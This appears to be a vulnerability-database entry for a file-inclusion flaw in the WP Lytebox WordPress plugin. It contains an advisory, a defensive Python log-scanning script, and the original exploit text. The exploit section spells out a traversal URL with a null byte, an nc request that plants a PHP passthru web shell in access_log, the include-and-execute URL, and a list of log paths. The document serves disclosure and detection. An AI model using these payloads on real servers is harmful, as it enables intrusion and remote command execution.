Vendor: WP Plugin Lytebox
By: TurkGuvenligi
CVSS: 9.3 (HIGH)
Title: Local File Include and Remote Code Execution
CWE: 98
Product Name: WP Plugin Lytebox
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

WP Plugin Lytebox Local File Include and Remote Code Execution

WP Plugin Lytebox is vulnerable to Local File Include and Remote Code Execution. The `pg` parameter of `main.php` is passed to a file include without validation, so an attacker who sends a crafted HTTP request can read sensitive files from the server by supplying a directory-traversal path terminated with a null byte and, by including a web server log file into which PHP code has previously been written, execute arbitrary code on the server.

Mitigation:

Update the WP Plugin Lytebox to the latest version to mitigate this vulnerability.
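As an added example, not part of this advisory and not code from the plugin or its author, the following Python script shows what a defender can look for in web server access logs after this kind of issue is disclosed. It parses a few constructed Apache combined-format lines (sample IP addresses, timestamps and paths are made up) and flags the request patterns the advisory describes: directory traversal in the `pg` parameter, a trailing null byte, an include whose target is one of the web server's own log files, and a request path carrying a PHP open tag, which is the trace a log-poisoning attempt leaves in `access_log`. It then correlates the last two indicators by source address.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format; hypothetical traffic,
# not taken from the advisory. The third line shows a request path carrying a
# PHP open tag, which is what a log-poisoning attempt leaves behind.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2009:10:01:02 +0000] "GET /wp-content/plugins/wp-lytebox/main.php?pg=gallery HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [26/May/2009:10:01:07 +0000] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../etc/profile%00 HTTP/1.1" 200 1893 "-" "curl/7.19"
10.0.0.9 - - [26/May/2009:10:01:09 +0000] "GET /<?php echo 'probe'; ?> HTTP/1.0" 404 207 "-" "-"
10.0.0.9 - - [26/May/2009:10:01:15 +0000] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../var/log/apache2/access_log HTTP/1.1" 200 3012 "-" "curl/7.19"
10.0.0.7 - - [26/May/2009:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Leading fields of a combined-format line. The request is captured whole
# because a poisoned request path may itself contain spaces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

# File names that only make sense as an include target if the goal is to
# execute whatever the web server wrote into its own logs.
LOG_FILE_HINTS = ("access_log", "access.log", "error_log", "error.log")


def split_request(request):
    """Split 'METHOD target PROTO' into its parts, tolerating spaces in target."""
    parts = request.split(" ")
    if len(parts) < 3:
        return None
    return parts[0], " ".join(parts[1:-1]), parts[-1]


def analyze_target(target):
    """Return the list of indicators found in one request target."""
    # Decode twice so %2e%2e%2f and %2500 are seen as ../ and NUL.
    decoded = unquote(unquote(target))
    indicators = []
    if "../" in decoded or "..\\" in decoded:
        indicators.append("path_traversal")
    if "\x00" in decoded:
        indicators.append("null_byte")
    if any(hint in decoded for hint in LOG_FILE_HINTS):
        indicators.append("log_file_include")
    if "<?php" in decoded or "<?=" in decoded:
        indicators.append("php_tag_in_request")
    return indicators


def scan_log(text):
    """Parse log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parsed = split_request(match.group("request"))
        if parsed is None:
            continue
        _method, target, _proto = parsed
        indicators = analyze_target(target)
        if indicators:
            alerts.append({
                "ip": match.group("ip"),
                "status": int(match.group("status")),
                "target": target,
                "indicators": indicators,
            })
    return alerts


def poisoning_chain_sources(alerts):
    """IPs that first planted a PHP tag and later included a log file."""
    planted, included = set(), set()
    for alert in alerts:  # alerts are in log order, so "later" is preserved
        if "php_tag_in_request" in alert["indicators"]:
            planted.add(alert["ip"])
        if "log_file_include" in alert["indicators"] and alert["ip"] in planted:
            included.add(alert["ip"])
    return included


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(alert["ip"], alert["status"], alert["indicators"], alert["target"])
    print("log-poisoning chain from:", sorted(poisoning_chain_sources(found)))
```

Two points worth keeping in mind when adapting this: the planting request usually produces a 404, so a rule that only inspects successful requests misses the first half of the chain, and the log-file hints should cover the same set of error_log and access_log locations that the advisory's path list enumerates. The null-byte truncation the advisory relies on was removed from PHP's file functions in PHP 5.3.4, so on current PHP the `%00` indicator signals an attempt rather than a working read, while the traversal itself is still worth alerting on.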

Exploit-DB raw data:

WP Plugin Lytebox Local File Include and Remote Code Exe.

Download: http://grupenet.com/wp-content/uploads/wp-lytebox.zip

Author : TurkGuvenligi

Site : www.turkguvenligi.info - admin@turkguvenligi.info

Agd_Scorp - t4cs1zkr4L - TheHacker - Fatih - BLaSTeR

LFI:

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/profile%00

RCE:

open cmd (we open cmd)

nc -vv 127.0.0.1 80 (connecting)
GET /<?php passthru(\$_GET[cmd]); ?> HTTP/1.0
Host : www.target.com

Our error is recorded in access_log :) yeah

http://localhost/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../var/log/apache2/access_log&cmd=[RCE]

access_log file:

../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log

goodbye. [www.turkguvenligi.info]

# milw0rm.com [2009-05-26]